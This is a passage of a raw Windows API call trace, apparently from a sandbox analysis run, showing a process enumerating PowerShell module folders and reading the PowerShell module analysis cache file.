ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0262.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0262.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0262.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0262.883] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", nBufferLength=0x55, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation", lpFilePart=0x0) returned 0x54 [0262.884] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c368a7, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7db0 [0262.884] FindNextFileW (in: hFindFile=0x1acc7db0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c368a7, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0262.886] FindNextFileW (in: hFindFile=0x1acc7db0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xb914059, ftLastAccessTime.dwHighDateTime=0x1d5ace1, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.1", cAlternateFileName="")) returned 1 [0262.886] FindNextFileW (in: hFindFile=0x1acc7db0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0262.886] FindClose (in: hFindFile=0x1acc7db0 | out: hFindFile=0x1acc7db0) returned 1 [0262.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0262.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0262.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0262.886] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0262.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3d8) returned 1 [0262.886] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b83e700 | out: lpFileInformation=0x1b83e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ddb9fba, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19928ea3, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x2ddb9fba, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0262.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e388) returned 1 [0262.891] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0262.891] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0262.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x8a [0262.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x8a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x89 [0262.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0262.894] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x235d498 | out: lpFileInformation=0x235d498*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ddb9fba, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19928ea3, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x2ddb9fba, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0262.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0262.901] GetEnvironmentVariableW (in: lpName="PSModuleAnalysisCachePath", lpBuffer=0x1b83c580, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0262.901] CoTaskMemAlloc (cb=0x20c) returned 0x1a8c7fc0 [0262.901] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a8c7fc0 | out: pszPath="C:\\Users\\OqXZRaykm\\AppData\\Local") returned 0x0 [0262.901] CoTaskMemFree (pv=0x1a8c7fc0) [0262.901] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x21 [0262.901] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local", nBufferLength=0x21, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0262.902] GetFileAttributesW (lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0x20 [0262.902] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0262.902] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x52, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x51 [0262.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83d568) returned 1 [0262.903] CreateFileW (lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x794 [0262.903] GetFileType (hFile=0x794) returned 0x1 [0262.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83d4d8) returned 1 [0262.903] GetFileType (hFile=0x794) returned 0x1 [0262.903] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d5c8, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d5c8*=0x1000, lpOverlapped=0x0) returned 1 [0262.930] ReadFile (in: hFile=0x794, lpBuffer=0x235e574, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e574*, lpNumberOfBytesRead=0x1b83d5d8*=0xc, lpOverlapped=0x0) returned 1 [0262.930] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0262.934] ReadFile (in: hFile=0x794, lpBuffer=0x235e576, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e576*, lpNumberOfBytesRead=0x1b83d5d8*=0x9, lpOverlapped=0x0) returned 1 [0262.934] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0262.937] ReadFile (in: hFile=0x794, lpBuffer=0x235e57e, nNumberOfBytesToRead=0xb, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e57e*, lpNumberOfBytesRead=0x1b83d5d8*=0xb, lpOverlapped=0x0) returned 1 [0262.937] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0262.938] ReadFile (in: hFile=0x794, lpBuffer=0x235e572, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e572*, lpNumberOfBytesRead=0x1b83d5d8*=0x2, lpOverlapped=0x0) returned 1 [0262.938] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d598, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d598*=0x1000, lpOverlapped=0x0) returned 1 [0262.940] ReadFile (in: hFile=0x794, lpBuffer=0x235e571, nNumberOfBytesToRead=0x3, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e571*, lpNumberOfBytesRead=0x1b83d5d8*=0x3, lpOverlapped=0x0) returned 1 [0262.940] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0262.945] ReadFile (in: hFile=0x794, lpBuffer=0x235e57a, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e57a*, lpNumberOfBytesRead=0x1b83d5d8*=0x4, lpOverlapped=0x0) returned 1 [0262.945] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0262.946] ReadFile (in: hFile=0x794, lpBuffer=0x235e578, nNumberOfBytesToRead=0xa, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e578*, lpNumberOfBytesRead=0x1b83d5d8*=0xa, lpOverlapped=0x0) returned 1 [0262.946] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0262.947] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d598, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d598*=0x1000, lpOverlapped=0x0) returned 1 [0262.948] ReadFile (in: hFile=0x794, lpBuffer=0x235e573, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e573*, lpNumberOfBytesRead=0x1b83d5d8*=0x1, lpOverlapped=0x0) returned 1 [0262.948] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d598, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d598*=0x1000, lpOverlapped=0x0) returned 1 [0262.950] ReadFile (in: hFile=0x794, lpBuffer=0x235e571, nNumberOfBytesToRead=0x3, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e571*, lpNumberOfBytesRead=0x1b83d5d8*=0x3, lpOverlapped=0x0) returned 1 [0262.950] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d598, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d598*=0x1000, lpOverlapped=0x0) returned 1 [0262.957] ReadFile (in: hFile=0x794, lpBuffer=0x235e572, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e572*, lpNumberOfBytesRead=0x1b83d5d8*=0x2, lpOverlapped=0x0) returned 1 [0262.958] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d598, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d598*=0x1000, lpOverlapped=0x0) returned 1 [0262.967] ReadFile (in: hFile=0x794, lpBuffer=0x235e575, nNumberOfBytesToRead=0xd, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e575*, lpNumberOfBytesRead=0x1b83d5d8*=0xd, lpOverlapped=0x0) returned 1 [0262.967] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0262.971] ReadFile (in: hFile=0x794, lpBuffer=0x235e575, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e575*, lpNumberOfBytesRead=0x1b83d5d8*=0xc, lpOverlapped=0x0) returned 1 [0262.971] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d5d8*=0x1000, lpOverlapped=0x0) returned 1 [0262.994] ReadFile (in: hFile=0x794, lpBuffer=0x235e57b, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e57b*, lpNumberOfBytesRead=0x1b83d5d8*=0xf, lpOverlapped=0x0) returned 1 [0262.994] ReadFile (in: hFile=0x794, lpBuffer=0x235e9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83d5d8, lpOverlapped=0x0 | out: lpBuffer=0x235e9b0*, lpNumberOfBytesRead=0x1b83d5d8*=0x1a5, lpOverlapped=0x0) returned 1 [0262.995] GetEnvironmentVariableW (in: lpName="PSDisableModuleAnalysisCacheCleanup", lpBuffer=0x1b83d3e0, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0263.002] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x1b83d4a8 | out: UnbiasedTime=0x1b83d4a8) returned 1 [0263.026] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x1b83d4b8 | out: UnbiasedTime=0x1b83d4b8) returned 1 [0263.031] CloseHandle (hObject=0x794) returned 1 [0263.032] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psd1")) returned 0xffffffff [0263.033] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psm1")) returned 0xffffffff [0263.033] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.cdxml")) returned 0xffffffff [0263.034] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.xaml")) returned 0xffffffff [0263.034] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.ni.dll")) returned 0xffffffff [0263.035] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.dll")) returned 0xffffffff [0263.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0263.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0263.036] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c5ca32, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc70f0 [0263.036] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c5ca32, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.036] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa0cd22d5, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa0cd22d5, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="")) returned 1 [0263.037] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0263.038] FindClose (in: hFindFile=0x1acc70f0 | out: hFindFile=0x1acc70f0) returned 1 [0263.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.038] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0263.038] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0263.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3d8) returned 1 [0263.039] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b83e700 | out: lpFileInformation=0x1b83e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc998ac1f, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1997516a, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x7b27e470, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x922)) returned 1 [0263.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e388) returned 1 [0263.045] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0263.045] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0263.046] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0263.046] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0263.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.046] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23bf670 | out: lpFileInformation=0x23bf670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc998ac1f, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1997516a, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x7b27e470, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x922)) returned 1 [0263.046] SetThreadErrorMode (dwNewMode=0x0, 